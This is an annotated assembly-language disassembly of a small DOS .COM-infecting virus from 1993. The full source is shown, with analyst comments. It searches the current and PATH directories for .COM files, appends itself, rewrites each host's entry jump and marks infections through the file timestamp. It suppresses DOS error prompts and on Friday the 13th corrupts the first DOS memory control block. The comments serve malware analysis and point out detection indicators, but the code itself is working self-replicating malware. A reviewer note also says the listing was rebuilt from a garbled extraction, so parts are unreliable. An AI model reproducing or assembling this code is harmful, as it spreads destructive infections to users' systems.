;*************************************************************************
;*                                                                       *
;*  it.asm                                                               *
;*  origin: mexico                                                       *
;*  size: 457                                                            *
;*  disassembly & analysis by: kohntark                                  *
;*  created: 24-apr-93                                                   *
;*                                                                       *
;*************************************************************************
; NOTE(review): this listing was recovered from a column-garbled PDF
; extraction (labels, mnemonics, operands and comments had been spread
; over separate lines). Mnemonic/operand pairing and label placement
; follow the DOS API usage and the offset table below; verify against
; the original listing or the sample before relying on a single line.
; The whole listing is lowercase; strings such as 'path=' and the
; copyright are compared/stored byte-exact, so the real sample may use
; uppercase (the DOS environment stores PATH= in uppercase) -- confirm.
;
; What the visible code does: a 457-byte (1c9h) appending .COM infector.
; It overwrites the first 3 bytes of a host with a jmp, keeps the
; original 3 bytes inside its own image (host_stub), searches *.com in
; the current directory and in every PATH= directory, marks infected
; files by forcing the timestamp seconds field to 60, hooks int 24h so
; failing DOS calls never prompt the user, and on a Friday the 13th
; writes a zero byte into the first DOS memory control block.
;
; Data offsets, all relative to bp (bp = virus - 12ch, see get_poe):
;   710d (2c6h)  int_24h_entry   critical-error handler
;   726d         copyright       '(c) itv85020203',0  (scan string)
;   742d         'path=',  747d (2ebh) '*.com',0
;   753d (2f1h)  host_stub       host's original first 3 bytes
;   756d (2f4h)  new_jump        e9h; 757d (2f5h) = jmp displacement
;   759d  PATH= resume pointer, 761d  file-name pointer
;   763d/765d  saved DTA offset/segment, 767d (2ffh)  private DTA:
;       314h attr, 315h time, 317h date, 319h size, 31dh name
;   32ah  file-name workspace (path + '*.com' / path + name)
; The image written to a host covers bp+12ch .. bp+2f4h only; every
; variable from 757d on exists in memory, not in the file.

main    segment
        assume  cs:main, ds:main
        org     100h

;-----------------------------------------------------------------------
; First-generation host.  Its first instruction, add ax,22h (bytes
; 05 22 00, the same bytes stored in host_stub), has been replaced by
; the 3-byte jmp virus.  The rest is padding that ends in int 20h.
;-----------------------------------------------------------------------
host:
        jmp     virus                   ; (0147) overwrote "add ax,22h"
        add     bx,22h
        add     cx,23h
        add     dx,2dh
        add     si,17h
        add     di,22h
        nop
        nop
        nop
        nop
        nop
        add     ax,22h
        add     bx,22h
        add     cx,23h
        add     dx,2dh
        add     si,17h
        add     di,22h
        nop
        nop
        nop
        nop
        nop
        add     ax,22h
        add     bx,22h
        add     cx,23h
        add     dx,2dh
        add     si,17h
        add     di,22h
        nop
        nop
        nop
        nop
        nop
        int     20h                     ; host program terminate

;*****************************************************************************
; virus starts here
;*****************************************************************************
virus:
        push    ax                      ; save ax (original note: unnecessary)
        call    get_poe                 ; pushes the runtime address of get_poe
get_poe:
        pop     bp                      ; bp = address of get_poe (virus + 4)
        sub     bp,304d                 ; bp = virus - 12ch: base for every
                                        ; [bp+N] reference, so the same code
                                        ; works at whatever offset the host
                                        ; ends (delta-offset technique)

;****************************************
; restore host
;****************************************
        lea     si,[bp+753d]            ; host_stub: original 3 host bytes
        mov     di,100h                 ; .COM entry point
        mov     cx,3                    ; restore 3 bytes
        cld                             ; forward string ops
        rep     movsb                   ; host's first instruction is back

;****************************************
; get dta's address
;****************************************
        push    es                      ; save es (PSP segment on .COM entry;
                                        ; popped again after the PATH scan)
        mov     ah,2fh                  ; DOS: get DTA address
        int     21h                     ; returns es:bx (the original comment
                                        ; said es:dx; the code stores bx)

;****************************************
; save dta address into v-code
;****************************************
        mov     ss:763d[bp],bx          ; (600d:02fb) saved DTA offset
        mov     ss:765d[bp],es          ; (600d:02fd) saved DTA segment

;****************************************
; redirect the dta into v-code
;****************************************
        mov     ah,1ah                  ; DOS: set DTA
        lea     dx,[bp+767d]            ; private DTA in the heap past the code,
        int     21h                     ; so findfirst/next leave the host's
                                        ; DTA (and PSP command tail) untouched

;****************************************
; hook int 24h critical error handler
;****************************************
        mov     ax,2524h                ; DOS: set interrupt vector 24h
        lea     dx,[bp+710d]            ; int_24h_entry (below)
        int     21h                     ; a write to a write-protected or bad
                                        ; disk now fails the DOS call with CF=1
                                        ; instead of showing the DOS prompt

;****************************************
; scan for 'path=' in environment
;****************************************
        mov     es,ds:44d               ; PSP:2ch = environment segment
        xor     di,di                   ; start of the environment block
find_path:
        lea     si,[bp+742d]            ; "path=" (original note: addr 438)
        lodsb                           ; al = first key byte
        mov     cx,8000h                ; scan up to 32K
        repne   scasb                   ; es:[di] -> just past the next 'p'

        mov     cx,4
;***************************************
; loop to check for the next 4
; characters
;***************************************
check_next_4:
        lodsb                           ; next key byte
        scasb                           ; compare with the environment byte
        jnz     find_path               ; mismatch: look for the next 'p'
        loop    check_next_4            ; all 4 matched -> fall through

        ; NOTE(review): there is no "not found" exit.  If the environment
        ; holds no matching key, cx runs out, the 4-byte check fails and the
        ; scan resumes from di -- it keeps walking memory beyond the
        ; environment block (di wraps at 64K) until something matches.
        ; The compare is byte-exact, so case matters (see file header).
        pop     es                      ; es back to the PSP segment
        mov     ss:759d[bp],di          ; di = just past "path=": resume pointer
        lea     di,[bp+32ah]            ; file-name workspace
        jmp     short slash_ok          ; (01d2) first pass searches the
                                        ; current directory only

;******************************************
; look in the path for more subdirectories
;******************************************
set_subdir:
        cmp     byte ptr ss:759d[bp],00 ; (600d:02f7) resume pointer cleared?
                                        ; NOTE(review): only the low byte of
                                        ; the word pointer is tested, so an
                                        ; environment offset such as 0100h is
                                        ; mistaken for "no more directories"
        jne     found_subdir
        jmp     reset_dta               ; (029e) PATH exhausted: clean up

found_subdir:
        push    ds
        mov     ds,ds:44d               ; ds = environment segment
        mov     si,ss:759d[bp]          ; si = current position in PATH=
        lea     di,[bp+32ah]            ; di = file-name workspace
move_subdir:
        lodsb                           ; copy one directory entry
        cmp     al,3bh                  ; ';' separates PATH entries
        je      moved_one
        or      al,al                   ; 0 ends the variable
        jz      moved_last_one
        stosb                           ; no length check on the workspace
        jmp     short move_subdir       ; (01b6)
moved_last_one:
        xor     si,si                   ; si = 0 marks the last directory
moved_one:
        pop     ds
        mov     ss:759d[bp],si          ; where to resume next time (or 0)
        cmp     byte ptr [di-1],5ch     ; entry already ends in '\'?
        je      slash_ok
        mov     al,5ch                  ; '\'
        stosb                           ; append the separator
slash_ok:
        mov     ss:761d[bp],di          ; the file name will go here
        lea     si,[bp+2ebh]            ; "*.com",0
        mov     cx,6                    ; 6 bytes incl. terminator
        rep     movsb                   ; workspace = path\*.com

;************************************
; find files to infect
;************************************
        mov     ah,4eh                  ; DOS: find first
        mov     cx,3                    ; include read-only and hidden files
        lea     dx,[bp+32ah]            ; path\*.com
        int     21h
        jmp     short find_first        ; shared carry test below
find_next:
        mov     ah,4fh                  ; DOS: find next
        int     21h
find_first:
        jnc     found_file              ; CF=0: a match is in the private DTA
        jmp     short set_subdir        ; no (more) matches: next PATH entry

found_file:
        mov     al,ss:315h[bp]          ; DTA+16h: file time, low byte
        and     al,1eh                  ; bits 1-4 of the 2-second count
        cmp     al,1eh                  ; 30 -> "60 seconds" = infection marker
        je      find_next               ; already infected, skip
                                        ; NOTE(review): bit 0 is masked out,
                                        ; so a 62-second stamp also passes
                                        ; as "infected".  Detection: .COM
                                        ; files whose seconds field is 60
                                        ; are a simple on-disk indicator.

        cmp     word ptr ss:319h[bp],0fbc2h ; DTA+1ah: file size, low word
        ja      find_next               ; too big to append 1c9h bytes to a
                                        ; 64K .COM.  Only the low word is
                                        ; checked; the high word at 31bh is
                                        ; ignored

        lea     si,[bp+31dh]            ; DTA+1eh: ASCIIZ name found
        mov     di,ss:761d[bp]          ; append it after the path
more_chars:
        lodsb                           ; copy name ...
        stosb
        or      al,al
        jnz     more_chars              ; ... up to and including the 0

;**********************************
; get file's attributes from dta
;**********************************
        mov     ax,4301h                ; DOS: set file attributes
        xor     cx,cx                   ; clear read-only/hidden/system so the
        lea     dx,[bp+32ah]            ; read/write open below succeeds
        int     21h                     ; originals stay at DTA+15h (314h)

;************************************
; open file for i/o
;************************************
        mov     ax,3d02h                ; DOS: open, read/write access
        lea     dx,[bp+32ah]            ; path\filename
        int     21h
        jc      reset_attr              ; cannot open: put attributes back
        mov     bx,ax                   ; bx = handle for the calls below

;*****************************************
; read file's 1st 3 bytes
;*****************************************
        mov     ah,3fh                  ; DOS: read from handle
        mov     cx,3
        lea     dx,[bp+2f1h]            ; into host_stub, which lies inside
        int     21h                     ; the image written below
        jc      reset_date              ; problem: set marker and exit
        cmp     ax,3
        jne     reset_date              ; short read: set marker and exit

;**************************************
; move file pointer to eof
;**************************************
        mov     ax,4202h                ; DOS: lseek, offset 0 from end
        xor     cx,cx
        xor     dx,dx
        int     21h                     ; dx:ax = file size
        jc      reset_date

;*****************************************
; calculate host's jump to virus address
;*****************************************
        sub     ax,3                    ; rel16 is measured from the end of
        mov     word ptr ss:757d[bp],ax ; (600d:02f5) the 3-byte jmp at 100h

;***************************************
; write virus to eof
;***************************************
        mov     ah,40h                  ; DOS: write to handle
        mov     cx,1c9h                 ; 457 bytes
        lea     dx,[bp+12ch]            ; image start (virus - 12ch)
        int     21h
        jc      reset_date              ; problem: set marker and exit
        cmp     ax,1c9h                 ; whole image written?
        jne     reset_date              ; NOTE(review): a partial write is
                                        ; not undone; the file keeps the
                                        ; garbage and still gets the marker

;***************************************
; move file ptr to beginning of file
;***************************************
        mov     ax,4200h                ; DOS: lseek, offset 0 from start
        xor     cx,cx
        xor     dx,dx
        int     21h
        jc      reset_date

;****************************************
; write jmp code to virus at the
; beginning of the new host
;****************************************
        mov     ah,40h                  ; DOS: write to handle
        mov     cx,3
        lea     dx,[bp+2f4h]            ; new_jump: e9h + displacement
        int     21h                     ; result is not checked

;***************************************
; reset file's date and time and fix id
;***************************************
reset_date:
        mov     ax,5701h                ; DOS: set file date and time
        mov     cx,ss:315h[bp]          ; (600d:0315) time as found in the DTA
        mov     dx,ss:317h[bp]          ; (600d:0317) date as found in the DTA
        and     cx,0ffe0h               ; clear the 2-second field
        or      cl,1eh                  ; seconds = 30*2 = 60: infection marker
        int     21h                     ; everything else is unchanged, so a
                                        ; directory listing shows no new date

;*********************************
; close file handle
;*********************************
        mov     ah,3eh                  ; DOS: close, bx = handle
        int     21h

;*********************************
; restore file attrs
;*********************************
reset_attr:
        mov     ax,4301h                ; DOS: set file attributes
        xor     cx,cx
        mov     cl,ss:314h[bp]          ; (600d:0314) attributes saved in DTA
        lea     dx,[bp+32ah]            ; path\filename
        int     21h                     ; read-only/hidden bits are back

;****************************************
; reset dta
;****************************************
reset_dta:
        push    ds                      ; save current data segment
        mov     ah,1ah                  ; DOS: set DTA
        lds     dx,dword ptr ss:763d[bp] ; (600d:02fb) saved DTA segment:offset
        int     21h                     ; host's DTA is active again

;******************************************
; restore int 24h, critical error handler
;******************************************
        lds     dx,dword ptr es:12h     ; (600d:0012) PSP+12h: the int 24h
                                        ; vector DOS saved for this program.
                                        ; Assumes es still holds the PSP
                                        ; segment (restored after the PATH
                                        ; scan) -- verify
        mov     ax,2524h                ; DOS: set interrupt vector 24h
        int     21h
        pop     ds                      ; restore data segment

;*************************************
; find out if current date is
; the friday the 13th
;*************************************
        mov     ah,2ah                  ; DOS: get date; cx=year, dh=month,
        int     21h                     ; dl=day, al=weekday (0 = Sunday)
        cmp     dl,0dh                  ; day of month 13?
        jne     exit
        cmp     al,5                    ; weekday 5 = Friday?
        jne     exit                    ; not Friday the 13th: leave quietly

;*************************************
; kill dos memory size
; every command run will give a
; out of memory message
;*************************************
        push    es
        mov     ah,52h                  ; DOS: get List of Lists (es:bx)
        int     21h
        mov     es,es:[bx-2]            ; word before the list: segment of
                                        ; the first memory control block
        mov     byte ptr es:[0000],00   ; NOTE(review): offset 0 of an MCB is
                                        ; its 'M'/'Z' signature byte, not its
                                        ; size (offset 3).  Zeroing it breaks
                                        ; the arena chain; "out of memory" in
                                        ; the comment above describes the
                                        ; symptom rather than the field
        pop     es

exit:
        pop     ax                      ; ax pushed at virus entry
        xor     bx,bx                   ; clear registers so the host sees
        xor     cx,cx                   ; a roughly pristine entry state
        xor     dx,dx
        xor     si,si
        xor     di,di
        mov     bp,100h                 ; host entry point
        push    bp                      ; as the return address
        xor     bp,bp
        retn                            ; run the restored host

;*******************************************************************************
;***********************************
; int 24h critical error handler
;***********************************
; Invoked by DOS when an int 21h call hits a hardware error (e.g. a
; write-protected disk).  Instead of answering the abort/retry/fail
; question it throws away int 24h's own frame and the register frame
; the int 21h dispatcher pushed, then returns to the virus's int 21h
; caller with CF=1 -- so the ordinary jc paths above handle the failure
; and no prompt is ever shown.  This relies on the (undocumented)
; dispatcher stack layout; it is specific to the DOS versions of the
; time.
int_24h_entry:
        add     sp,6                    ; drop int 24h's return ip, cs, flags
        pop     ax                      ; unwind the dispatcher's saved
        pop     bx                      ; registers in push-reverse order
        pop     cx
        pop     dx
        pop     si
        pop     di
        pop     bp
        pop     ds
        pop     es
        stc                             ; report the DOS call as failed
        retf    2                       ; far return to the int 21h caller,
                                        ; discarding its saved flags so CF=1
                                        ; survives

int_24h_entry_end:
;******************************************************************************
; data carried in the image (present in every infected file)
;******************************************************************************
copyright   db      '(c) itv85020203'   ; bp+726d; plain-text signature, a
            db      0                   ; usable scan string
            db      'path=*.com',0      ; bp+742d "path=" key, bp+2ebh "*.com"
host_stub   db      05, 22h, 00         ; bp+753d; add ax,34d = 05 22 00, the
                                        ; host's original first 3 bytes
                                        ; (overwritten per host by the read)
new_jump    db      0e9h                ; bp+756d; jmp opcode.  The image ends
                                        ; here (12ch + 1c9h = 2f5h); the
                                        ; displacement word at 757d and all
                                        ; later variables exist only in memory

;**************************************************
; the dta gets redirected to the heap after file.
; also the working space goes in the heap
;**************************************************
main    ends
        end     host
